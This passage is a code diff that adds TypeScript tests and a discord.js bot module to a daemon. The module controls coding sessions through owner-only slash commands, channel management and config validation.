fails (no real gateway)', async () => { + const dir = tmpDir(); + cleanupDirs.push(dir); + const logPath = join(dir, 'bad-token.log'); + + const config: DaemonConfig = { + discord: { + token: 'invalid-token-that-will-fail-login', + guild_id: 'g1', + owner_id: 'o1', + }, + projects: { scan_roots: [] }, + log: { file: logPath, level: 'debug', max_size_mb: 50 }, + }; + + const logger = new Logger({ filePath: logPath, level: 'debug' }); + const daemon = new Daemon(config, logger); + + // start() should NOT throw — bot login failure is non-fatal + await daemon.start(); + + const origExit = process.exit; + // @ts-expect-error — overriding process.exit for test + process.exit = () => {}; + try { + await daemon.shutdown(); + } finally { + process.exit = origExit; + } + + // Small flush delay + await new Promise((r) => setTimeout(r, 50)); + + const content = readFileSync(logPath, 'utf-8'); + // Should have logged the login failure + assert.ok(content.includes('discord bot login failed'), 'should log bot login failure'); + // Token should never appear in logs + assert.ok(!content.includes('invalid-token-that-will-fail-login'), 'token must not appear in logs'); + }); + + it('does not attempt login when discord config has no token', async () => { + const dir = tmpDir(); + cleanupDirs.push(dir); + const logPath = join(dir, 'no-token.log'); + + // Config with discord block but empty token + const config: DaemonConfig = { + discord: { + token: '', + guild_id: 'g1', + owner_id: 'o1', + }, + projects: { scan_roots: [] }, + log: { file: logPath, level: 'debug', max_size_mb: 50 }, + }; + + const logger = new Logger({ filePath: logPath, level: 'debug' }); + const daemon = new Daemon(config, logger); + + await daemon.start(); + + const origExit = process.exit; + // @ts-expect-error — overriding process.exit for test + process.exit = () => {}; + try { + await daemon.shutdown(); + } finally { + process.exit = origExit; + } + + const content = readFileSync(logPath, 'utf-8'); + // Should 
not attempt login — no token + assert.ok(!content.includes('discord bot login failed')); + assert.ok(!content.includes('bot ready')); + }); +}); + +// ---------- sanitizeChannelName ---------- + +describe('sanitizeChannelName', () => { + it('converts basic path to gsd-prefixed name', () => { + assert.equal(sanitizeChannelName('/home/user/my-project'), 'gsd-my-project'); + }); + + it('converts path with special characters to hyphens', () => { + assert.equal(sanitizeChannelName('/home/user/My_Cool.Project!v2'), 'gsd-my-cool-project-v2'); + }); + + it('truncates very long names to 100 chars', () => { + const longName = 'a'.repeat(200); + const result = sanitizeChannelName(`/home/${longName}`); + assert.ok(result.length <= 100, `Expected <= 100 chars, got ${result.length}`); + assert.ok(result.startsWith('gsd-')); + }); + + it('cleans leading/trailing dots and underscores', () => { + assert.equal(sanitizeChannelName('/home/...___project___...'), 'gsd-project'); + }); + + it('returns gsd-unnamed for empty basename', () => { + assert.equal(sanitizeChannelName(''), 'gsd-unnamed'); + assert.equal(sanitizeChannelName('/'), 'gsd-unnamed'); + }); + + it('returns gsd-unnamed for basename with only special chars', () => { + assert.equal(sanitizeChannelName('/home/!!!'), 'gsd-unnamed'); + }); + + it('collapses consecutive hyphens', () => { + assert.equal(sanitizeChannelName('/home/a---b---c'), 'gsd-a-b-c'); + }); + + it('handles Windows-style backslash paths', () => { + assert.equal(sanitizeChannelName('C:\\Users\\lex\\my-project'), 'gsd-my-project'); + }); + + it('handles name at exact prefix + 96 chars = 100 char limit', () => { + // gsd- is 4 chars, so a 96-char basename should produce exactly 100 + const name96 = 'a'.repeat(96); + const result = sanitizeChannelName(`/home/${name96}`); + assert.equal(result.length, 100); + assert.equal(result, `gsd-${'a'.repeat(96)}`); + }); + + it('handles whitespace-only basename', () => { + assert.equal(sanitizeChannelName('/home/ '), 
'gsd-unnamed'); + }); +}); + +// ---------- ChannelManager ---------- + +describe('ChannelManager', () => { + // Helper to create a mock Guild with controllable channel cache and create method + function createMockGuild() { + const channels = new Map(); + let createCounter = 0; + + const mockGuild = { + id: 'guild-123', // @everyone role ID matches guild ID + channels: { + cache: { + get: (id: string) => channels.get(id), + find: (fn: (ch: any) => boolean) => { + for (const ch of channels.values()) { + if (fn(ch)) return ch; + } + return undefined; + }, + }, + create: async (opts: { name: string; type: number; parent?: string; permissionOverwrites?: any[] }) => { + createCounter++; + const id = `chan-${createCounter}`; + const ch = { + id, + name: opts.name, + type: opts.type, + parentId: opts.parent ?? null, + edit: async (editOpts: any) => { + // Simulate edit — update parent + ch.parentId = editOpts.parent ?? ch.parentId; + return ch; + }, + }; + channels.set(id, ch); + return ch; + }, + }, + _channels: channels, // internal for test inspection + _getCreateCount: () => createCounter, + }; + + return mockGuild; + } + + function createMockLogger() { + const entries: { level: string; msg: string; data?: any }[] = []; + return { + debug: (msg: string, data?: any) => entries.push({ level: 'debug', msg, data }), + info: (msg: string, data?: any) => entries.push({ level: 'info', msg, data }), + warn: (msg: string, data?: any) => entries.push({ level: 'warn', msg, data }), + error: (msg: string, data?: any) => entries.push({ level: 'error', msg, data }), + entries, + close: async () => {}, + }; + } + + it('resolveCategory creates category when not found', async () => { + const guild = createMockGuild(); + const logger = createMockLogger(); + const mgr = new ChannelManager({ guild: guild as any, logger: logger as any }); + + const cat = await mgr.resolveCategory(); + assert.equal(cat.name, 'GSD Projects'); + assert.equal(cat.type, ChannelType.GuildCategory); + }); + + 
it('resolveCategory returns cached category on second call', async () => { + const guild = createMockGuild(); + const logger = createMockLogger(); + const mgr = new ChannelManager({ guild: guild as any, logger: logger as any }); + + const cat1 = await mgr.resolveCategory(); + const cat2 = await mgr.resolveCategory(); + assert.equal(cat1.id, cat2.id); + // Only one create call should have been made + assert.equal(guild._getCreateCount(), 1); + }); + + it('resolveCategory finds existing category by name', async () => { + const guild = createMockGuild(); + // Pre-populate a matching category + guild._channels.set('existing-cat', { + id: 'existing-cat', + name: 'GSD Projects', + type: ChannelType.GuildCategory, + parentId: null, + }); + + const logger = createMockLogger(); + const mgr = new ChannelManager({ guild: guild as any, logger: logger as any }); + + const cat = await mgr.resolveCategory(); + assert.equal(cat.id, 'existing-cat'); + // No create calls — found existing + assert.equal(guild._getCreateCount(), 0); + }); + + it('createProjectChannel creates text channel under category', async () => { + const guild = createMockGuild(); + const logger = createMockLogger(); + const mgr = new ChannelManager({ guild: guild as any, logger: logger as any }); + + const channel = await mgr.createProjectChannel('/home/user/my-project'); + assert.equal(channel.name, 'gsd-my-project'); + assert.equal(channel.type, ChannelType.GuildText); + // Category was created first (chan-1), then channel (chan-2) + assert.equal(channel.parentId, 'chan-1'); + }); + + it('archiveChannel moves channel to archive category', async () => { + const guild = createMockGuild(); + const logger = createMockLogger(); + const mgr = new ChannelManager({ guild: guild as any, logger: logger as any }); + + // Create a project channel first + const channel = await mgr.createProjectChannel('/home/user/project'); + const channelId = channel.id; + + // Archive it + await mgr.archiveChannel(channelId); + + // The 
channel should have been edit()-ed with the archive category as parent + const archived = guild._channels.get(channelId)!; + // Archive category was created as the 3rd channel (chan-3): category(chan-1), text(chan-2), archive(chan-3) + assert.equal(archived.parentId, 'chan-3'); + + // Verify archive log + const archiveLog = logger.entries.find((e) => e.msg === 'channel archived'); + assert.ok(archiveLog, 'should log channel archived'); + assert.equal(archiveLog!.data.channelId, channelId); + }); + + it('archiveChannel warns when channel not found', async () => { + const guild = createMockGuild(); + const logger = createMockLogger(); + const mgr = new ChannelManager({ guild: guild as any, logger: logger as any }); + + await mgr.archiveChannel('nonexistent-id'); + const warnLog = logger.entries.find((e) => e.msg === 'archive target not found'); + assert.ok(warnLog, 'should warn about missing channel'); + }); + + it('uses custom category name when provided', async () => { + const guild = createMockGuild(); + const logger = createMockLogger(); + const mgr = new ChannelManager({ + guild: guild as any, + logger: logger as any, + categoryName: 'Custom Category', + }); + + const cat = await mgr.resolveCategory(); + assert.equal(cat.name, 'Custom Category'); + }); +}); + +// ---------- buildCommands ---------- + +describe('buildCommands', () => { + it('returns array with correct command names', () => { + const commands = buildCommands(); + assert.equal(commands.length, 4); + const names = commands.map((c) => c.name); + assert.ok(names.includes('gsd-status'), 'should include gsd-status'); + assert.ok(names.includes('gsd-start'), 'should include gsd-start'); + assert.ok(names.includes('gsd-stop'), 'should include gsd-stop'); + assert.ok(names.includes('gsd-verbose'), 'should include gsd-verbose'); + }); + + it('each command has a description', () => { + const commands = buildCommands(); + for (const cmd of commands) { + assert.ok(cmd.description, `command ${cmd.name} should 
have a description`); + assert.ok(cmd.description.length > 0, `command ${cmd.name} description should be non-empty`); + } + }); +}); + +// ---------- formatSessionStatus ---------- + +describe('formatSessionStatus', () => { + function mockSession(overrides: Partial = {}): ManagedSession { + return { + sessionId: 'sess-1', + projectDir: '/home/user/project', + projectName: 'project', + status: 'running', + client: {} as any, + events: [], + pendingBlocker: null, + cost: { totalCost: 0.1234, tokens: { input: 100, output: 50, cacheRead: 0, cacheWrite: 0 } }, + startTime: Date.now() - 120_000, // 2 minutes ago + ...overrides, + }; + } + + it('returns "No active sessions." for empty array', () => { + assert.equal(formatSessionStatus([]), 'No active sessions.'); + }); + + it('formats single session with project name and status', () => { + const result = formatSessionStatus([mockSession()]); + assert.ok(result.includes('project'), 'should contain project name'); + assert.ok(result.includes('running'), 'should contain status'); + assert.ok(result.includes('$'), 'should contain cost'); + }); + + it('formats multiple sessions on separate lines', () => { + const sessions = [ + mockSession({ projectName: 'alpha', status: 'running' }), + mockSession({ projectName: 'beta', status: 'blocked' }), + ]; + const result = formatSessionStatus(sessions); + assert.ok(result.includes('alpha'), 'should contain first project'); + assert.ok(result.includes('beta'), 'should contain second project'); + const lines = result.split('\n'); + assert.equal(lines.length, 2, 'should have one line per session'); + }); + + it('formats 5 sessions correctly', () => { + const sessions = Array.from({ length: 5 }, (_, i) => + mockSession({ projectName: `proj-${i}`, status: i % 2 === 0 ? 
'running' : 'completed' }), + ); + const result = formatSessionStatus(sessions); + const lines = result.split('\n'); + assert.equal(lines.length, 5); + for (let i = 0; i < 5; i++) { + assert.ok(lines[i].includes(`proj-${i}`)); + } + }); +}); + +// ---------- Command dispatch (mock interaction) ---------- + +describe('command dispatch', () => { + // Minimal mock of a ChatInputCommandInteraction + function mockInteraction(commandName: string, userId: string = 'owner-1') { + let replied = false; + let replyContent = ''; + + return { + user: { id: userId }, + type: 2, // InteractionType.ApplicationCommand + isChatInputCommand: () => true, + commandName, + reply: async (opts: { content: string; ephemeral?: boolean }) => { + replied = true; + replyContent = opts.content; + }, + _getReplied: () => replied, + _getReplyContent: () => replyContent, + }; + } + + // Minimal mock of a non-command interaction + function mockNonCommandInteraction(userId: string = 'owner-1') { + let replied = false; + return { + user: { id: userId }, + type: 3, // InteractionType.MessageComponent + isChatInputCommand: () => false, + _getReplied: () => replied, + }; + } + + // We can't easily test through DiscordBot.handleInteraction since it's private. + // Instead, test the pure functions that the handler calls, and test auth guard + // behavior via the mock interaction flow. + // The command routing logic is tested indirectly through integration of the + // pure helpers (buildCommands, formatSessionStatus, isAuthorized). 
+ + it('gsd-status with no sessions produces empty message', () => { + // Tests the formatSessionStatus path that /gsd-status calls + const result = formatSessionStatus([]); + assert.equal(result, 'No active sessions.'); + }); + + it('unknown command name is not in buildCommands list', () => { + const commands = buildCommands(); + const names = commands.map((c) => c.name); + assert.ok(!names.includes('gsd-unknown'), 'unknown should not be in command list'); + }); + + it('auth guard rejects non-owner on interaction', () => { + // Simulates the first check in handleInteraction + const authorized = isAuthorized('intruder-999', 'owner-1'); + assert.equal(authorized, false); + }); + + it('auth guard accepts owner on interaction', () => { + const authorized = isAuthorized('owner-1', 'owner-1'); + assert.equal(authorized, true); + }); +}); + +// ---------- Config validation: new fields ---------- + +describe('validateConfig — control_channel_id and orchestrator', () => { + it('parses control_channel_id from discord block', () => { + const config = validateConfig({ + discord: { + token: 'tok', + guild_id: 'g1', + owner_id: 'o1', + control_channel_id: 'ch-123', + }, + }); + assert.equal(config.discord?.control_channel_id, 'ch-123'); + }); + + it('omits control_channel_id when not present', () => { + const config = validateConfig({ + discord: { + token: 'tok', + guild_id: 'g1', + owner_id: 'o1', + }, + }); + assert.equal(config.discord?.control_channel_id, undefined); + }); + + it('parses orchestrator model and max_tokens', () => { + const config = validateConfig({ + discord: { + token: 'tok', + guild_id: 'g1', + owner_id: 'o1', + orchestrator: { model: 'claude-opus-2025', max_tokens: 2048 }, + }, + }); + assert.equal(config.discord?.orchestrator?.model, 'claude-opus-2025'); + assert.equal(config.discord?.orchestrator?.max_tokens, 2048); + }); + + it('missing orchestrator block results in undefined', () => { + const config = validateConfig({ + discord: { + token: 'tok', + 
guild_id: 'g1', + owner_id: 'o1', + }, + }); + assert.equal(config.discord?.orchestrator, undefined); + }); + + it('empty orchestrator block has no model or max_tokens', () => { + const config = validateConfig({ + discord: { + token: 'tok', + guild_id: 'g1', + owner_id: 'o1', + orchestrator: {}, + }, + }); + // orchestrator object should exist but with no values set + assert.ok(config.discord?.orchestrator !== undefined); + assert.equal(config.discord?.orchestrator?.model, undefined); + assert.equal(config.discord?.orchestrator?.max_tokens, undefined); + }); + + it('ignores non-numeric max_tokens', () => { + const config = validateConfig({ + discord: { + token: 'tok', + guild_id: 'g1', + owner_id: 'o1', + orchestrator: { max_tokens: 'not a number' }, + }, + }); + assert.equal(config.discord?.orchestrator?.max_tokens, undefined); + }); + + it('ignores non-string model', () => { + const config = validateConfig({ + discord: { + token: 'tok', + guild_id: 'g1', + owner_id: 'o1', + orchestrator: { model: 42 }, + }, + }); + assert.equal(config.discord?.orchestrator?.model, undefined); + }); +}); + +// ---------- Daemon wiring: orchestrator ---------- + +describe('Daemon orchestrator wiring', () => { + it('orchestrator is undefined when control_channel_id is not set', async () => { + const dir = tmpDir(); + cleanupDirs.push(dir); + const logPath = join(dir, 'no-orchestrator.log'); + + const config: DaemonConfig = { + discord: undefined, + projects: { scan_roots: [] }, + log: { file: logPath, level: 'debug', max_size_mb: 50 }, + }; + + const logger = new Logger({ filePath: logPath, level: 'debug' }); + const daemon = new Daemon(config, logger); + + await daemon.start(); + assert.equal(daemon.getOrchestrator(), undefined); + + const origExit = process.exit; + // @ts-expect-error — overriding process.exit for test + process.exit = () => {}; + try { + await daemon.shutdown(); + } finally { + process.exit = origExit; + } + }); + + it('orchestrator is undefined when discord has 
no control_channel_id', async () => { + // Even with a discord block that fails login, orchestrator should not be created + // because there's no control_channel_id + const dir = tmpDir(); + cleanupDirs.push(dir); + const logPath = join(dir, 'no-ctl-chan.log'); + + const config: DaemonConfig = { + discord: { + token: 'bad-token', + guild_id: 'g1', + owner_id: 'o1', + // control_channel_id intentionally omitted + }, + projects: { scan_roots: [] }, + log: { file: logPath, level: 'debug', max_size_mb: 50 }, + }; + + const logger = new Logger({ filePath: logPath, level: 'debug' }); + const daemon = new Daemon(config, logger); + + await daemon.start(); + // Login fails, so orchestrator can't be wired regardless. But the code path + // that checks control_channel_id comes after successful login/eventBridge wiring. + // Since login fails, orchestrator is undefined. + assert.equal(daemon.getOrchestrator(), undefined); + + const origExit = process.exit; + // @ts-expect-error — overriding process.exit for test + process.exit = () => {}; + try { + await daemon.shutdown(); + } finally { + process.exit = origExit; + } + }); +}); + +// ---------- /gsd-start and /gsd-stop logic paths ---------- + +describe('/gsd-start and /gsd-stop logic', () => { + // These test the observable logic paths exercised by the handlers. + // Since handleGsdStart/handleGsdStop are private, we test the data layer + // they depend on — project scanning, session listing, and edge cases. 
+ + it('/gsd-start: scanForProjects returning 0 projects', async () => { + // Simulates the "no projects" path + const { scanForProjects } = await import('./project-scanner.js'); + // With no scan roots, should return empty + const projects = await scanForProjects([]); + assert.equal(projects.length, 0); + }); + + it('/gsd-stop: getAllSessions returns empty when no sessions active', async () => { + const { SessionManager } = await import('./session-manager.js'); + const dir = tmpDir(); + cleanupDirs.push(dir); + const logPath = join(dir, 'sm-test.log'); + const logger = new Logger({ filePath: logPath, level: 'debug' }); + const sm = new SessionManager(logger); + const sessions = sm.getAllSessions(); + assert.equal(sessions.length, 0); + await logger.close(); + }); + + it('/gsd-stop: filters to active sessions only', () => { + // Simulate the filter logic used in handleGsdStop + const allSessions: Partial[] = [ + { sessionId: 's1', status: 'running', projectName: 'alpha' }, + { sessionId: 's2', status: 'completed', projectName: 'beta' }, + { sessionId: 's3', status: 'blocked', projectName: 'gamma' }, + { sessionId: 's4', status: 'error', projectName: 'delta' }, + { sessionId: 's5', status: 'starting', projectName: 'epsilon' }, + { sessionId: 's6', status: 'cancelled', projectName: 'zeta' }, + ]; + const active = allSessions.filter( + (s) => s.status === 'running' || s.status === 'blocked' || s.status === 'starting', + ); + assert.equal(active.length, 3); + assert.deepEqual(active.map((s) => s.projectName), ['alpha', 'gamma', 'epsilon']); + }); + + it('/gsd-start: >25 projects are truncated for select menu', () => { + // Simulate the truncation logic + const projects = Array.from({ length: 30 }, (_, i) => ({ + name: `project-${i}`, + path: `/home/user/project-${i}`, + markers: [] as string[], + lastModified: Date.now(), + })); + const truncated = projects.slice(0, 25); + assert.equal(truncated.length, 25); + assert.equal(truncated[24].name, 'project-24'); + }); +}); 
diff --git a/packages/daemon/src/discord-bot.ts b/packages/daemon/src/discord-bot.ts new file mode 100644 index 000000000..e4c302354 --- /dev/null +++ b/packages/daemon/src/discord-bot.ts @@ -0,0 +1,491 @@ +/** + * DiscordBot — wraps discord.js Client with login/destroy lifecycle, auth guard, + * and integration with the daemon's SessionManager. + * + * Auth model (D016): single Discord user ID allowlist. All non-owner interactions + * silently ignored; rejections logged at debug level (userId only, no PII). + */ + +import { + Client, + GatewayIntentBits, + REST, + StringSelectMenuBuilder, + ActionRowBuilder, + ComponentType, + type Interaction, + type Guild, + type StringSelectMenuInteraction, +} from 'discord.js'; +import type { DaemonConfig, VerbosityLevel, ProjectInfo } from './types.js'; +import type { Logger } from './logger.js'; +import type { SessionManager } from './session-manager.js'; +import { ChannelManager } from './channel-manager.js'; +import { buildCommands, registerGuildCommands, formatSessionStatus } from './commands.js'; +import type { EventBridge } from './event-bridge.js'; + +// --------------------------------------------------------------------------- +// Pure helpers — exported for testability +// --------------------------------------------------------------------------- + +/** + * Auth guard: returns true iff userId matches the configured owner_id. + * Rejects empty or missing ownerId to fail closed. + */ +export function isAuthorized(userId: string, ownerId: string): boolean { + if (!ownerId || !userId) return false; + return userId === ownerId; +} + +/** + * Validates that all required discord config fields are present. + * Throws with a descriptive message on the first missing field. 
+ */ +export function validateDiscordConfig( + config: DaemonConfig['discord'], +): asserts config is NonNullable { + if (!config) { + throw new Error('Discord config is undefined'); + } + if (!config.token || config.token.trim() === '') { + throw new Error('Discord config missing required field: token'); + } + if (!config.guild_id || config.guild_id.trim() === '') { + throw new Error('Discord config missing required field: guild_id'); + } + if (!config.owner_id || config.owner_id.trim() === '') { + throw new Error('Discord config missing required field: owner_id'); + } +} + +// --------------------------------------------------------------------------- +// DiscordBot class +// --------------------------------------------------------------------------- + +export interface DiscordBotOptions { + config: NonNullable; + logger: Logger; + sessionManager: SessionManager; + /** Optional function to scan for projects (passed from Daemon). */ + scanProjects?: () => Promise; +} + +export class DiscordBot { + private client: Client | null = null; + private destroyed = false; + private channelManager: ChannelManager | null = null; + private eventBridge: EventBridge | null = null; + + private readonly config: NonNullable; + private readonly logger: Logger; + private readonly sessionManager: SessionManager; + private readonly scanProjects?: () => Promise; + + constructor(opts: DiscordBotOptions) { + this.config = opts.config; + this.logger = opts.logger; + this.sessionManager = opts.sessionManager; + this.scanProjects = opts.scanProjects; + } + + /** + * Create the discord.js Client, register event handlers, and log in. + * Throws on login failure — the caller (Daemon) decides whether to continue without the bot. 
+ */ + async login(): Promise { + const client = new Client({ + intents: [ + GatewayIntentBits.Guilds, + GatewayIntentBits.GuildMessages, + GatewayIntentBits.MessageContent, + ], + }); + + client.once('ready', (readyClient) => { + const guildNames = readyClient.guilds.cache.map((g) => g.name).join(', '); + this.logger.info('bot ready', { + username: readyClient.user.tag, + guilds: guildNames, + }); + + // Register slash commands for the configured guild + const rest = new REST({ version: '10' }).setToken(this.config.token); + const commands = buildCommands(); + registerGuildCommands( + rest, + readyClient.user.id, + this.config.guild_id, + commands, + this.logger, + ).catch((err) => { + // Should not reach here — registerGuildCommands catches internally + this.logger.warn('unexpected command registration error', { + error: err instanceof Error ? err.message : String(err), + }); + }); + }); + + client.on('interactionCreate', (interaction: Interaction) => { + this.handleInteraction(interaction); + }); + + // Debug: log all incoming messages at debug level + client.on('messageCreate', (msg) => { + this.logger.debug('raw messageCreate', { + authorId: msg.author.id, + authorBot: msg.author.bot, + channelId: msg.channelId, + contentLength: msg.content.length, + hasContent: msg.content.length > 0, + }); + }); + + // Reconnection observability — structured logging for all shard lifecycle events (R027) + client.on('shardError', (error) => { + this.logger.error('discord shard error', { error: error.message }); + }); + client.on('shardDisconnect', (event, shardId) => { + this.logger.warn('discord shard disconnected', { shardId, code: event.code }); + }); + client.on('shardReconnecting', (shardId) => { + this.logger.info('discord shard reconnecting', { shardId }); + }); + client.on('shardResume', (shardId, replayedEvents) => { + this.logger.info('discord shard resumed', { shardId, replayedEvents }); + }); + client.on('warn', (message) => { + this.logger.warn('discord warning', 
{ message }); + }); + client.on('error', (error) => { + this.logger.error('discord error', { error: error.message }); + }); + + // Wait for both login AND the 'ready' event. + // client.login() resolves on WebSocket auth, but the 'ready' event fires + // asynchronously later. We need 'ready' before getChannelManager() works. + let readyTimeout: ReturnType | undefined; + let readySettled = false; + const readyPromise = new Promise((resolve, reject) => { + readyTimeout = setTimeout(() => { + if (!readySettled) { readySettled = true; reject(new Error('Discord ready timeout (30s)')); } + }, 30_000); + const cleanup = () => { + if (readyTimeout) { clearTimeout(readyTimeout); readyTimeout = undefined; } + }; + client.once('ready', () => { + cleanup(); + if (!readySettled) { readySettled = true; resolve(); } + }); + client.once('error', (err) => { + cleanup(); + if (!readySettled) { readySettled = true; reject(err); } + }); + // shardDisconnect fires on fatal gateway errors (e.g. 4014 disallowed intents) + client.once('shardDisconnect', (event) => { + cleanup(); + if (!readySettled) { readySettled = true; reject(new Error(`Shard disconnected: ${event.code}`)); } + }); + }); + + try { + await client.login(this.config.token); + } catch (err) { + // Login itself failed — clean up the ready timer so it doesn't fire as unhandled rejection + if (readyTimeout) { clearTimeout(readyTimeout); readyTimeout = undefined; } + readySettled = true; + throw err; + } + await readyPromise; + this.client = client; + this.destroyed = false; + } + + /** + * Destroy the discord.js Client. Idempotent — safe to call multiple times + * or before login(). 
+ */ + async destroy(): Promise { + if (this.destroyed || !this.client) { + this.destroyed = true; + return; + } + + try { + // discord.js destroy() is synchronous but may throw on double-destroy + this.client.destroy(); + this.logger.info('bot destroyed'); + } catch (err) { + // Swallow cleanup errors — shutdown must not fail + this.logger.debug('bot destroy error (swallowed)', { + error: err instanceof Error ? err.message : String(err), + }); + } finally { + this.client = null; + this.destroyed = true; + } + } + + // --------------------------------------------------------------------------- + // Public accessors + // --------------------------------------------------------------------------- + + /** + * Lazily create a ChannelManager from the configured guild. + * Returns null if the client isn't ready or the guild isn't found. + */ + getChannelManager(): ChannelManager | null { + if (this.channelManager) return this.channelManager; + if (!this.client?.isReady()) return null; + + const guild = this.client.guilds.cache.get(this.config.guild_id); + if (!guild) { + this.logger.warn('guild not found for channel manager', { guildId: this.config.guild_id }); + return null; + } + + this.channelManager = new ChannelManager({ guild, logger: this.logger }); + return this.channelManager; + } + + /** + * Return the underlying discord.js Client, or null if not logged in. + * Used by Daemon to pass to EventBridge as BridgeClient. + */ + getClient(): Client | null { + return this.client; + } + + /** + * Set the EventBridge reference so the bot can dispatch /gsd-verbose commands. + * Called by Daemon after creating the EventBridge. 
+ */ + setEventBridge(bridge: EventBridge): void { + this.eventBridge = bridge; + } + + // --------------------------------------------------------------------------- + // Private: interaction handling + // --------------------------------------------------------------------------- + + private handleInteraction(interaction: Interaction): void { + if (!isAuthorized(interaction.user.id, this.config.owner_id)) { + this.logger.debug('auth rejected', { userId: interaction.user.id }); + return; + } + + // Only handle chat input (slash) commands + if (!interaction.isChatInputCommand()) { + this.logger.debug('non-command interaction', { + type: interaction.type, + userId: interaction.user.id, + }); + return; + } + + const { commandName } = interaction; + this.logger.info('command handled', { commandName, userId: interaction.user.id }); + + switch (commandName) { + case 'gsd-status': { + const sessions = this.sessionManager.getAllSessions(); + const content = formatSessionStatus(sessions); + interaction.reply({ content, ephemeral: true }).catch((err) => { + this.logger.warn('gsd-status reply failed', { + error: err instanceof Error ? err.message : String(err), + }); + }); + break; + } + case 'gsd-start': + this.handleGsdStart(interaction).catch((err) => { + this.logger.warn('gsd-start handler error', { + error: err instanceof Error ? err.message : String(err), + }); + }); + break; + case 'gsd-stop': + this.handleGsdStop(interaction).catch((err) => { + this.logger.warn('gsd-stop handler error', { + error: err instanceof Error ? err.message : String(err), + }); + }); + break; + case 'gsd-verbose': { + if (!this.eventBridge) { + interaction.reply({ content: 'Event bridge not available.', ephemeral: true }).catch((err) => { + this.logger.warn('gsd-verbose reply failed', { + error: err instanceof Error ? err.message : String(err), + }); + }); + break; + } + const level = (interaction.options.getString('level') ?? 
'default') as VerbosityLevel; + const channelId = interaction.channelId; + this.eventBridge.getVerbosityManager().setLevel(channelId, level); + interaction.reply({ content: `Verbosity set to **${level}** for this channel.`, ephemeral: true }).catch((err) => { + this.logger.warn('gsd-verbose reply failed', { + error: err instanceof Error ? err.message : String(err), + }); + }); + break; + } + default: + interaction.reply({ content: 'Unknown command', ephemeral: true }).catch((err) => { + this.logger.warn('unknown command reply failed', { + error: err instanceof Error ? err.message : String(err), + }); + }); + break; + } + } + + // --------------------------------------------------------------------------- + // Private: /gsd-start handler + // --------------------------------------------------------------------------- + + private async handleGsdStart(interaction: import('discord.js').ChatInputCommandInteraction): Promise { + await interaction.deferReply({ ephemeral: true }); + this.logger.info('gsd-start: scanning projects'); + + if (!this.scanProjects) { + await interaction.editReply({ content: 'Project scanning not available.' }); + return; + } + + let projects: ProjectInfo[]; + try { + projects = await this.scanProjects(); + } catch (err) { + this.logger.error('gsd-start: scan failed', { + error: err instanceof Error ? err.message : String(err), + }); + await interaction.editReply({ content: 'Failed to scan for projects.' }); + return; + } + + if (projects.length === 0) { + await interaction.editReply({ content: 'No projects found.' 
}); + return; + } + + // Discord select menus support max 25 options + const truncated = projects.slice(0, 25); + const select = new StringSelectMenuBuilder() + .setCustomId('gsd-start-select') + .setPlaceholder('Select a project to start') + .addOptions( + truncated.map((p) => ({ + label: p.name.slice(0, 100), // Discord label max 100 chars + value: p.path, + description: p.markers.join(', ').slice(0, 100) || undefined, + })), + ); + + const row = new ActionRowBuilder().addComponents(select); + const reply = await interaction.editReply({ + content: `Select a project to start (${truncated.length}${projects.length > 25 ? ` of ${projects.length}` : ''} projects):`, + components: [row], + }); + + try { + const collected = await reply.awaitMessageComponent({ + componentType: ComponentType.StringSelect, + time: 60_000, + filter: (i) => i.user.id === interaction.user.id, + }) as StringSelectMenuInteraction; + + const projectPath = collected.values[0]; + this.logger.info('gsd-start: project selected', { projectPath }); + + // Defer the update immediately — startSession can take 10-30s to spawn the GSD process, + // and Discord's component interaction token expires in 3 seconds without deferral. + await collected.deferUpdate(); + + try { + const sessionId = await this.sessionManager.startSession({ projectDir: projectPath }); + await interaction.editReply({ + content: `✅ Session started for **${projectPath}** (ID: \`${sessionId}\`)`, + components: [], + }); + } catch (err) { + const errMsg = err instanceof Error ? 
err.message : String(err); + this.logger.error('gsd-start: startSession failed', { error: errMsg, projectPath }); + await interaction.editReply({ + content: `❌ Failed to start session: ${errMsg}`, + components: [], + }); + } + } catch { + // Timeout or other collector error + this.logger.info('gsd-start: selection timed out'); + await interaction.editReply({ content: 'Selection timed out.', components: [] }); + } + } + + // --------------------------------------------------------------------------- + // Private: /gsd-stop handler + // --------------------------------------------------------------------------- + + private async handleGsdStop(interaction: import('discord.js').ChatInputCommandInteraction): Promise { + await interaction.deferReply({ ephemeral: true }); + this.logger.info('gsd-stop: listing sessions'); + + const allSessions = this.sessionManager.getAllSessions(); + const activeSessions = allSessions.filter( + (s) => s.status === 'running' || s.status === 'blocked' || s.status === 'starting', + ); + + if (activeSessions.length === 0) { + await interaction.editReply({ content: 'No active sessions.' 
}); + return; + } + + // Discord select menus support max 25 options + const truncated = activeSessions.slice(0, 25); + const select = new StringSelectMenuBuilder() + .setCustomId('gsd-stop-select') + .setPlaceholder('Select a session to stop') + .addOptions( + truncated.map((s) => ({ + label: `${s.projectName} (${s.status})`.slice(0, 100), + value: s.sessionId, + })), + ); + + const row = new ActionRowBuilder().addComponents(select); + const reply = await interaction.editReply({ + content: `Select a session to stop (${truncated.length} active):`, + components: [row], + }); + + try { + const collected = await reply.awaitMessageComponent({ + componentType: ComponentType.StringSelect, + time: 60_000, + filter: (i) => i.user.id === interaction.user.id, + }) as StringSelectMenuInteraction; + + const sessionId = collected.values[0]; + this.logger.info('gsd-stop: session selected', { sessionId }); + + try { + await this.sessionManager.cancelSession(sessionId); + await collected.update({ + content: `✅ Session \`${sessionId}\` stopped.`, + components: [], + }); + } catch (err) { + const errMsg = err instanceof Error ? err.message : String(err); + this.logger.error('gsd-stop: cancelSession failed', { error: errMsg, sessionId }); + await collected.update({ + content: `❌ Failed to stop session: ${errMsg}`, + components: [], + }); + } + } catch { + // Timeout or other collector error + this.logger.info('gsd-stop: selection timed out'); + await interaction.editReply({ content: 'Selection timed out.', components: [] }); + } + } +} diff --git a/packages/daemon/src/event-bridge.test.ts b/packages/daemon/src/event-bridge.test.ts new file mode 100644 index 000000000..8516b9dc4 --- /dev/null +++ b/packages/daemon/src/event-bridge.test.ts @@ -0,0 +1,619 @@ +/** + * event-bridge.test.ts — Tests for EventBridge orchestrator. 
